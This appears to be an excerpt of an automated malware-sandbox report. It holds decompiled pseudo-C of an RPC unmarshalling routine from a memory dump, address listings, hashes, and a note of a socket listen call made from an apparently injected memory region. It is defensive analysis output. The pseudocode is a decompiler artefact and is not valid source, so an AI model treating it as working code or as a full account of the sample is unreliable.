                                                                                              						L3:
                                                                                              						_t23 =  *(_t246 - 0xc) + 0x6f709b24; // 0xcccccc0f
                                                                                              						switch( *((intOrPtr*)(( *_t23 & 0x000000ff) * 4 +  &M6F709AE0))) {
                                                                                              							case 0:
                                                                                              								L4:
                                                                                              								E6F70AFA0( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc), 1);
                                                                                              								_push( *(_t246 + 0xc));
                                                                                              								_push( *( *(_t246 + 0xc)) & 0x0000ffff);
                                                                                              								_push("byte=%d => %p\n");
                                                                                              								0x6f700000();
                                                                                              								_t250 = _t250 + 0x18;
                                                                                              								 *(_t246 + 0xc) =  &(( *(_t246 + 0xc))[0]);
                                                                                              								goto L47;
                                                                                              							case 1:
                                                                                              								L5:
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                              								_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                              								_push("short=%d => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 2;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 2:
                                                                                              								L9:
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *( *(__ebp + 0xc));
                                                                                              								_push( *( *(__ebp + 0xc)));
                                                                                              								_push("long=%d => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 3:
                                                                                              								L12:
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 8);
                                                                                              								__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								asm("cvtss2sd xmm0, [eax]");
                                                                                              								__esp = __esp - 8;
                                                                                              								asm("movsd [esp], xmm0");
                                                                                              								_push("float=%f => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0x10;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 4:
                                                                                              								L13:
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *(__edx + 4);
                                                                                              								_push(__eax);
                                                                                              								__ecx =  *__edx;
                                                                                              								_push(__ecx);
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 8;
                                                                                              								_push(__eax);
                                                                                              								_push("longlong=%s => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                              								goto L47;
                                                                                              							case 5:
                                                                                              								L14:
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 8);
                                                                                              								__eax = E6F70AFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__esp = __esp - 8;
                                                                                              								asm("movsd xmm0, [eax]");
                                                                                              								asm("movsd [esp], xmm0");
                                                                                              								_push("double=%f => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0x10;
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 8;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 6:
                                                                                              								L6:
                                                                                              								__edx = __ebp - 4;
                                                                                              								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                              								__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__edx =  *( *(__ebp + 0xc));
                                                                                              								_push( *( *(__ebp + 0xc)));
                                                                                              								_push("enum16=%d => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                              									_push(0x6f5);
                                                                                              									__eax =  *0x6f700000();
                                                                                              								}
                                                                                              								L8:
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 7:
                                                                                              								L15:
                                                                                              								 *(__ebp - 0x1c) = 0;
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								_push("pointer => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 8;
                                                                                              								__eax =  *(__ebp + 0x10);
                                                                                              								__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              								if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              									__edx =  *(__ebp + 0x10);
                                                                                              									 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                              								}
                                                                                              								__eax =  *(__ebp + 0x14);
                                                                                              								__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              								if(__ecx != 0x11) {
                                                                                              									 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                              									__eax = E6F7073D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                              								}
                                                                                              								__eax =  *(__ebp + 8);
                                                                                              								__ecx =  *(__eax + 4);
                                                                                              								 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                              								__edx =  *(__ebp + 8);
                                                                                              								if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                              									__ecx =  *(__ebp + 0x14);
                                                                                              									__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              										 *(__ebp + 8) = E6F70AF00( *(__ebp + 8), 4);
                                                                                              									}
                                                                                              								} else {
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__edx =  *(__ecx + 0x34);
                                                                                              									 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									 *( *(__ebp + 8) + 0x34) = 0;
                                                                                              									 *(__ebp - 0x1c) = 1;
                                                                                              								}
                                                                                              								_t109 = __ebp + 0x18; // 0x6f703c70
                                                                                              								__ecx =  *_t109 & 0x000000ff;
                                                                                              								__edx =  *(__ebp + 0x14);
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *( *(__ebp + 0xc));
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								__eax =  *(__ebp - 0x20);
                                                                                              								__ecx =  *(__ebp + 8);
                                                                                              								__eax = E6F70B580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *_t109 & 0x000000ff);
                                                                                              								if( *(__ebp - 0x1c) == 0) {
                                                                                              									L29:
                                                                                              									__edx =  *(__ebp + 0x10);
                                                                                              									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                              										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                              									} else {
                                                                                              										__ecx =  *(__ebp + 0x14);
                                                                                              										__ecx =  *(__ebp + 0x14) + 4;
                                                                                              										 *(__ebp + 0x14) = __ecx;
                                                                                              									}
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              									goto L47;
                                                                                              								} else {
                                                                                              									do {
                                                                                              										L24:
                                                                                              										__edx =  *(__ebp + 8);
                                                                                              										__eax =  *(__edx + 0x14);
                                                                                              										_push( *(__edx + 0x14));
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__edx =  *( *(__ebp + 8));
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                              										_push( *(__eax + 4) -  *(__edx + 8));
                                                                                              										_push("buffer=%d/%d\n");
                                                                                              										0x6f700000();
                                                                                              										__esp = __esp + 0xc;
                                                                                              										__edx =  *(__ebp + 8);
                                                                                              										__eax =  *( *(__ebp + 8));
                                                                                              										__ecx =  *(__eax + 8);
                                                                                              										__edx =  *(__ebp + 8);
                                                                                              										__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              										__eax =  *(__ebp + 8);
                                                                                              										if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__edx =  *( *(__ebp + 8));
                                                                                              											__eax =  *(__edx + 8);
                                                                                              											__ecx =  *(__ebp + 8);
                                                                                              											__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                              											__edx =  *(__ebp + 8);
                                                                                              											 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                              											_push( *(__edx + 4) - __eax);
                                                                                              											_push("buffer overflow %d bytes\n");
                                                                                              											0x6f700000();
                                                                                              											__esp = __esp + 8;
                                                                                              										}
                                                                                              										__edx = 0;
                                                                                              									} while (0 != 0);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__ebp + 8);
                                                                                              									__edx =  *(__ecx + 4);
                                                                                              									 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                              									__eax =  *(__ebp + 8);
                                                                                              									__ecx =  *(__ebp - 0x20);
                                                                                              									 *( *(__ebp + 8) + 4) = __ecx;
                                                                                              									__edx =  *(__ebp + 0x14);
                                                                                              									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                              									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                              										__ecx =  *(__ebp + 8);
                                                                                              										__eax = E6F70AF00( *(__ebp + 8), 4);
                                                                                              									}
                                                                                              									goto L29;
                                                                                              								}
                                                                                              							case 8:
                                                                                              								L33:
                                                                                              								__ecx =  *(__ebp - 0x10);
                                                                                              								__edx = __ebp + 0xc;
                                                                                              								__eax = E6F707480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                              								goto L47;
                                                                                              							case 9:
                                                                                              								L34:
                                                                                              								__eax =  *(__ebp - 0x10);
                                                                                              								__ecx = __ebp + 0xc;
                                                                                              								__eax = E6F707480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                              								goto L47;
                                                                                              							case 0xa:
                                                                                              								L35:
                                                                                              								__edx =  *(__ebp - 0x10);
                                                                                              								__ebp + 0xc = E6F707480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                              								goto L47;
                                                                                              							case 0xb:
                                                                                              								L36:
                                                                                              								__ecx =  *(__ebp + 0x10);
                                                                                              								 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                              								 *(__ebp + 0xc) = E6F710730( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
                                                                                              								__ecx =  *(__ebp + 0x10);
                                                                                              								__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                              								 *(__ebp + 0xc) = __ecx;
                                                                                              								goto L47;
                                                                                              							case 0xc:
                                                                                              								goto L0;
                                                                                              							case 0xd:
                                                                                              								L45:
                                                                                              								goto L47;
                                                                                              							case 0xe:
                                                                                              								L10:
                                                                                              								__edx = __ebp - 0x24;
                                                                                              								 *(__ebp + 8) = E6F70AFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__edx =  *(__ebp - 0x24);
                                                                                              								 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__ecx =  *(__ebp + 0xc);
                                                                                              								__edx =  *__ecx;
                                                                                              								_push( *__ecx);
                                                                                              								_push("int3264=%ld => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								goto L47;
                                                                                              							case 0xf:
                                                                                              								L11:
                                                                                              								__ecx = __ebp - 0x28;
                                                                                              								__edx =  *(__ebp + 8);
                                                                                              								E6F70AFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                              								__ecx =  *(__ebp - 0x28);
                                                                                              								 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                              								__edx =  *(__ebp + 0xc);
                                                                                              								_push( *(__ebp + 0xc));
                                                                                              								__eax =  *(__ebp + 0xc);
                                                                                              								__ecx =  *( *(__ebp + 0xc));
                                                                                              								_push(__ecx);
                                                                                              								_push("uint3264=%ld => %p\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                              								goto L47;
                                                                                              							case 0x10:
                                                                                              								goto L46;
                                                                                              						}
                                                                                              					}
                                                                                              					return  *(_t246 + 0xc);
                                                                                              				}
                                                                                              			}






                                                                                              0x6f709ac3
                                                                                              0x6f709ac8
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad1
                                                                                              0x6f70959a
                                                                                              0x6f70959d
                                                                                              0x6f7095a4
                                                                                              0x00000000
                                                                                              0x6f7095ab
                                                                                              0x6f7095b5
                                                                                              0x6f7095c0
                                                                                              0x6f7095c7
                                                                                              0x6f7095c8
                                                                                              0x6f7095cd
                                                                                              0x6f7095d2
                                                                                              0x6f7095db
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7095e3
                                                                                              0x6f7095e5
                                                                                              0x6f7095ed
                                                                                              0x6f7095f5
                                                                                              0x6f7095f8
                                                                                              0x6f7095f9
                                                                                              0x6f7095fc
                                                                                              0x6f7095ff
                                                                                              0x6f709600
                                                                                              0x6f709605
                                                                                              0x6f70960a
                                                                                              0x6f70960d
                                                                                              0x6f709610
                                                                                              0x6f709613
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709671
                                                                                              0x6f709673
                                                                                              0x6f70967b
                                                                                              0x6f709683
                                                                                              0x6f709686
                                                                                              0x6f709687
                                                                                              0x6f70968a
                                                                                              0x6f70968c
                                                                                              0x6f70968d
                                                                                              0x6f709692
                                                                                              0x6f709697
                                                                                              0x6f70969a
                                                                                              0x6f70969d
                                                                                              0x6f7096a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709726
                                                                                              0x6f709728
                                                                                              0x6f70972c
                                                                                              0x6f709730
                                                                                              0x6f709738
                                                                                              0x6f70973b
                                                                                              0x6f70973c
                                                                                              0x6f70973f
                                                                                              0x6f709743
                                                                                              0x6f709746
                                                                                              0x6f70974b
                                                                                              0x6f709750
                                                                                              0x6f709755
                                                                                              0x6f709758
                                                                                              0x6f70975b
                                                                                              0x6f70975e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709766
                                                                                              0x6f709768
                                                                                              0x6f709770
                                                                                              0x6f709778
                                                                                              0x6f70977b
                                                                                              0x6f70977c
                                                                                              0x6f70977f
                                                                                              0x6f709782
                                                                                              0x6f709783
                                                                                              0x6f709785
                                                                                              0x6f709786
                                                                                              0x6f70978b
                                                                                              0x6f70978e
                                                                                              0x6f70978f
                                                                                              0x6f709794
                                                                                              0x6f709799
                                                                                              0x6f70979f
                                                                                              0x6f7097a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7097aa
                                                                                              0x6f7097ac
                                                                                              0x6f7097b0
                                                                                              0x6f7097b4
                                                                                              0x6f7097bc
                                                                                              0x6f7097bf
                                                                                              0x6f7097c0
                                                                                              0x6f7097c3
                                                                                              0x6f7097c6
                                                                                              0x6f7097ca
                                                                                              0x6f7097cf
                                                                                              0x6f7097d4
                                                                                              0x6f7097d9
                                                                                              0x6f7097dc
                                                                                              0x6f7097df
                                                                                              0x6f7097e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70961b
                                                                                              0x6f70961d
                                                                                              0x6f709625
                                                                                              0x6f70962d
                                                                                              0x6f709631
                                                                                              0x6f709634
                                                                                              0x6f709636
                                                                                              0x6f709639
                                                                                              0x6f70963a
                                                                                              0x6f70963d
                                                                                              0x6f70963f
                                                                                              0x6f709640
                                                                                              0x6f709645
                                                                                              0x6f70964a
                                                                                              0x6f70964d
                                                                                              0x6f709656
                                                                                              0x6f709658
                                                                                              0x6f70965d
                                                                                              0x6f70965d
                                                                                              0x6f709663
                                                                                              0x6f709663
                                                                                              0x6f709666
                                                                                              0x6f709669
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7097ea
                                                                                              0x6f7097ea
                                                                                              0x6f7097f1
                                                                                              0x6f7097f4
                                                                                              0x6f7097f5
                                                                                              0x6f7097fa
                                                                                              0x6f7097ff
                                                                                              0x6f709802
                                                                                              0x6f709805
                                                                                              0x6f70980b
                                                                                              0x6f70980d
                                                                                              0x6f709810
                                                                                              0x6f709810
                                                                                              0x6f709813
                                                                                              0x6f709816
                                                                                              0x6f70981c
                                                                                              0x6f709823
                                                                                              0x6f709827
                                                                                              0x6f70982c
                                                                                              0x6f70982f
                                                                                              0x6f709832
                                                                                              0x6f709835
                                                                                              0x6f709838
                                                                                              0x6f70983f
                                                                                              0x6f709860
                                                                                              0x6f709863
                                                                                              0x6f709869
                                                                                              0x6f709871
                                                                                              0x6f709876
                                                                                              0x6f709841
                                                                                              0x6f709841
                                                                                              0x6f709844
                                                                                              0x6f709847
                                                                                              0x6f70984a
                                                                                              0x6f70984d
                                                                                              0x6f709850
                                                                                              0x6f709857
                                                                                              0x6f709857
                                                                                              0x6f709879
                                                                                              0x6f709879
                                                                                              0x6f70987e
                                                                                              0x6f709882
                                                                                              0x6f709885
                                                                                              0x6f709888
                                                                                              0x6f70988c
                                                                                              0x6f709890
                                                                                              0x6f709894
                                                                                              0x6f7098a0
                                                                                              0x6f709935
                                                                                              0x6f709935
                                                                                              0x6f709938
                                                                                              0x6f70993e
                                                                                              0x6f70994e
                                                                                              0x6f709951
                                                                                              0x6f709940
                                                                                              0x6f709940
                                                                                              0x6f709943
                                                                                              0x6f709946
                                                                                              0x6f709946
                                                                                              0x6f709957
                                                                                              0x6f70995a
                                                                                              0x00000000
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a9
                                                                                              0x6f7098ac
                                                                                              0x6f7098ad
                                                                                              0x6f7098b0
                                                                                              0x6f7098b2
                                                                                              0x6f7098b8
                                                                                              0x6f7098bb
                                                                                              0x6f7098bc
                                                                                              0x6f7098c1
                                                                                              0x6f7098c6
                                                                                              0x6f7098c9
                                                                                              0x6f7098cc
                                                                                              0x6f7098ce
                                                                                              0x6f7098d1
                                                                                              0x6f7098d4
                                                                                              0x6f7098d7
                                                                                              0x6f7098dd
                                                                                              0x6f7098df
                                                                                              0x6f7098e2
                                                                                              0x6f7098e4
                                                                                              0x6f7098e7
                                                                                              0x6f7098ea
                                                                                              0x6f7098ed
                                                                                              0x6f7098f3
                                                                                              0x6f7098f5
                                                                                              0x6f7098f6
                                                                                              0x6f7098fb
                                                                                              0x6f709900
                                                                                              0x6f709900
                                                                                              0x6f709903
                                                                                              0x6f709903
                                                                                              0x6f709907
                                                                                              0x6f70990a
                                                                                              0x6f70990d
                                                                                              0x6f709910
                                                                                              0x6f709913
                                                                                              0x6f709916
                                                                                              0x6f709919
                                                                                              0x6f70991c
                                                                                              0x6f70991f
                                                                                              0x6f709925
                                                                                              0x6f709929
                                                                                              0x6f70992d
                                                                                              0x6f709932
                                                                                              0x00000000
                                                                                              0x6f709925
                                                                                              0x00000000
                                                                                              0x6f709962
                                                                                              0x6f709964
                                                                                              0x6f709968
                                                                                              0x6f70996c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709979
                                                                                              0x6f70997b
                                                                                              0x6f70997f
                                                                                              0x6f709983
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709990
                                                                                              0x6f709992
                                                                                              0x6f70999a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7099a7
                                                                                              0x6f7099a7

                                                                                              APIs
                                                                                              Strings
                                                                                              • no unmarshaller for embedded type %02x, xrefs: 6F709A91
                                                                                              • embedded complex (size=%d) => %p, xrefs: 6F709A19
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: embedded complex (size=%d) => %p$no unmarshaller for embedded type %02x
                                                                                              • API String ID: 2102423945-1287812044
                                                                                              • Opcode ID: 653bc96e0c261cb4364b500421623872223080770ca63d2c4f942b938896a4f2
                                                                                              • Instruction ID: e6fdc2a956316731dd006e4525254392d83b89ce65e7480c1acaeaab10f4cc1d
                                                                                              • Opcode Fuzzy Hash: 653bc96e0c261cb4364b500421623872223080770ca63d2c4f942b938896a4f2
                                                                                              • Instruction Fuzzy Hash: E13127F5900249AFCB08CF98C990AEF7BB5BF89311F148169F9559B344D330EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E6F7046B0(intOrPtr _a4, intOrPtr* _a8, void* _a12, signed int _a16) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* _t62;
                                                                                              				void* _t65;
                                                                                              
                                                                                              				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_a12 = _a12 + 1;
                                                                                              				_v12 = E6F70F410(_a4,  &_a12);
                                                                                              				0x6f700000("unmarshalled discriminant %x\n", _v12);
                                                                                              				_t65 = _t62 + 0x24;
                                                                                              				_a12 =  *_a12 + _a12;
                                                                                              				_v8 =  *_a12;
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					 *_a8 =  *0x6f700000(_a4, _v8 & 0x0000ffff);
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					E6F710730( *_a8, 0, _v8 & 0x0000ffff);
                                                                                              					_t65 = _t65 + 0xc;
                                                                                              				}
                                                                                              				return E6F70ED20(_a4, _a8, _v12, _a12, 0);
                                                                                              			}








                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p, %p, %p, %d)$unmarshalled discriminant %x
                                                                                              • API String ID: 2102423945-139691638
                                                                                              • Opcode ID: 866ace5b2a8c3aad293fc44906f8be01b14eff57a267f0bfd9eba5d95c7b48c2
                                                                                              • Instruction ID: c632c75bc51e35a309a86f1a514b5fa6a3e17b7fe418b824dc3b993274ccebd3
                                                                                              • Opcode Fuzzy Hash: 866ace5b2a8c3aad293fc44906f8be01b14eff57a267f0bfd9eba5d95c7b48c2
                                                                                              • Instruction Fuzzy Hash: 8A217CF9600249ABCB04DFA4DD40EAF3BB9BF49205F048559FD188B280E731EA60CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6F70AFD7
                                                                                              • pointer is the same as the buffer, xrefs: 6F70AFFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u$pointer is the same as the buffer
                                                                                              • API String ID: 4104443479-2199830383
                                                                                              • Opcode ID: d93e3f37e164f9ac7ddbda42d8cdbba1d7fc5049a781744baeabc4addac02e25
                                                                                              • Instruction ID: b5db112d7501beebdabbe8f681436423abd71075841aee6005f97618a43c126b
                                                                                              • Opcode Fuzzy Hash: d93e3f37e164f9ac7ddbda42d8cdbba1d7fc5049a781744baeabc4addac02e25
                                                                                              • Instruction Fuzzy Hash: C611F8B9200209AFCB04DF48C990D5ABBA6BF88354F19C658FC0D8B346D731FA91CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.386114351.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6d9a3349837bf2df1354a42019ccde984efe395a38e208ecbc8fb28f0fb84d28
                                                                                              • Instruction ID: e0f44439201967bb65230acd5b1adf07cfdd4673517f21d2862c2d8f160e9bb9
                                                                                              • Opcode Fuzzy Hash: 6d9a3349837bf2df1354a42019ccde984efe395a38e208ecbc8fb28f0fb84d28
                                                                                              • Instruction Fuzzy Hash: D4329074941229CFDB65DF24C894BEDB7B2BF4A304F5085EAD809AB250DB319E85CF84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
